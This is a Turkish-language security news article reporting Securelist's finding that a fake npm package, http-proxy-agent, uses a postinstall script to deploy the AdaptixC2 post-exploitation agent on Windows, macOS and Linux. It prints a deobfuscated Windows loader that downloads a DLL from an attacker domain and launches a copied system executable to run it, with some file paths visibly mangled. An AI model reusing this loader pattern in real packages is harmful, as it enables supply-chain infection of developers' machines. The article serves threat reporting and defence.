2025 yılında AdaptixC2 sömürü sonrası çerçevesinin ortaya çıkışı, açık kaynak tedarik zincirlerini hedef alan saldırgan araç setlerinin gelişiminde önemli bir dönüm noktası oldu.
Kendisini Cobalt Strike gibi yerleşik araçlara müthiş bir alternatif olarak konumlandıran AdaptixC2, istismar sonrası senaryolarda çeviklik ve gizlilik arayan tehdit aktörlerinin hızla ilgisini çekti.
Bu Ekim ayında araştırmacılar, kritik altyapı ve uygulama geliştirme için Node.js modüllerine bağımlı olan geliştiricileri ve kuruluşları hedef alan bir tedarik zinciri saldırısı olan npm paket kaydı yoluyla teslim edildiğini ortaya çıkardı.
Olay, aldatıcı bir npm paketi etrafında dönüyordu. https-proxy-utilsgibi yaygın olarak kullanılan meşru kitaplıkların işlevselliğini ve adlandırma kurallarını taklit eden http-proxy-agent.
Tehdit aktörleri, popüler modüllerden proxy ile ilgili özellikleri klonlayarak kötü amaçlı paketin hem yararlı hem de zararsız görünmesini sağladı.
Ancak kurulum sonrasında paket, AdaptixC2 aracısını indirip kurbanın sistemine dağıtmak için tasarlanmış bir kurulum sonrası komut dosyasını çalıştırdı ve uzaktan erişim ve daha geniş kapsamlı istismar için gizli bir dayanak noktası başlattı.
Securelist araştırmacıları, AdaptixC2 npm enfeksiyonunu tanımlayan ve analiz eden ilk kişiler oldu; hem saldırının teknik karmaşıklığına hem de açık kaynak tehdit ortamları açısından endişe verici sonuçlarına dikkat çekti.
NPM ekosistemi büyüdükçe saldırganlar da onun güvenini ve geniş erişimini giderek daha fazla istismar ediyor. Keşif, tedarik zinciri saldırılarının oluşturduğu kalıcı riskin altını çiziyor ve açık kaynak bileşenlerinin dikkatli bir şekilde incelenmesi ve sürekli izlenmesi ihtiyacını vurguluyor.
Enfeksiyon Mekanizması: İşletim Sistemine Özel Adaptasyon
AdaptixC2 npm kampanyasının öne çıkan bir özelliği, birden fazla işletim sistemi için uyarlanmış enfeksiyon stratejisidir. Kötü amaçlı paket yürütüldükten sonra ana bilgisayar işletim sistemini algılar ve yükü Windows, macOS veya Linux için tasarlanmış yöntemleri kullanarak dağıtır.
Windows için kod, aracıyı yasal bir yürütülebilir dosyanın yanında bir DLL olarak yükler ve tehlikeye atılan işlemi oluşturmak için JavaScript komut dosyasını kullanır.
%20and%20legitimate%20(right)%20packages%20(Source%20-%20Securelist).webp)
Aşağıda, Windows dağıtımı için kullanılan, gizliliği kaldırılmış bir kod parçası verilmiştir: –
async function onWindows() {
const url="https://cloudcenter.topsysupdate";
const dllPath="C:\\.dll";
const systemMsdtc="C:\\32.exe";
const tasksMsdtc="C:\\.exe";
try {
await downloadFile(url, dllPath);
fs.copyFileSync(systemMsdtc, tasksMsdtc);
const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
child.unref();
} catch (err) {
console.error(err);
}
}Bu esnek yaklaşım, kalıcı kontrol sağlamak için otomatik çalıştırma yapılandırmasını ve mimariye özgü ikili dağıtım özelliğini kullanarak macOS ve Linux sistemlerine yayılır.
Bu tür işletim sistemi hedefli enfeksiyon rutinleri, çerçevenin geleneksel tespitten kaçma yeteneğini derinleştirerek, çeşitli ortamlarda kullanım kapsamını genişletiyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
